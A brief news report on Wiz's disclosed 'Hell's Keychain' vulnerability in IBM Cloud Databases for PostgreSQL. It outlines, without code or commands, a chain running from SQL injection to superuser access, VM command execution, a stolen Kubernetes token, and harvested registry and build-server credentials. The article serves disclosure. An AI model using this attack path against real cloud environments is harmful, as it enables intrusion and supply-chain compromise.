IBM Cloud Supply Chain Vulnerability Demonstrates New Threat Class
Wiz security researchers discovered Hell’s Keychain, a first-of-its-kind cloud service provider supply-chain vulnerability, in IBM Cloud Databases for PostgreSQL.
This occurred while researchers were conducting a routine audit of IBM Cloud’s PostgreSQL-as-a-service to determine whether they could escalate privileges to become superusers, allowing them to execute arbitrary code on the underlying virtual machine and continue challenging internal security boundaries from there.
They are made up of three exposed secrets: the Kubernetes service account token, the private container registry password, and the CI/CD server credentials. They were combined with overly permissive network access to internal build servers, potentially allowing attackers to launch a supply chain attack on cloud customers by breaching internal IBM Cloud services and disrupting the hosted system’s internal image-building process.
There’s also a forbidden link, which represents network access and connects a production environment to its build environment, and The keychain, which represents the collection of one or more scattered secrets discovered by the attacker throughout the target environment. Either scenario is unsanitary but not dangerous on its own. However, when combined, they form a deadly combination , according to the researchers.
Hell’s Keychain starts with a SQL injection flaw in ICD, which grants an attacker superuser (aka “ibm”) privileges, which are then used to execute arbitrary commands on the underlying virtual machine that hosts the database instance.
This capability is used to gain access to a Kubernetes API token file, allowing for broader post-exploitation efforts such as retrieving container images from IBM’s private container registry, which stores images related to ICD for PostgreSQL, and scanning those images for additional secrets.
“Modifications to the PostgreSQL engine effectively introduced new vulnerabilities to the service,” the researchers wrote. “These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform.”
Wiz went on to say that it could extract internal artifact repository and FTP credentials from image manifest files, effectively granting unrestricted read-write access to trusted repositories and IBM build servers.
Although IBM stated that the bug could have affected its Cloud Databases for PostgreSQL instances, it found no evidence of malicious activity using the PostgreSQL privilege escalation via SQL Injection, and it has since patched the vulnerability for all of its customers. There is no need for the customer to take any action.
The sources for this piece includes an article in TheHackerNews.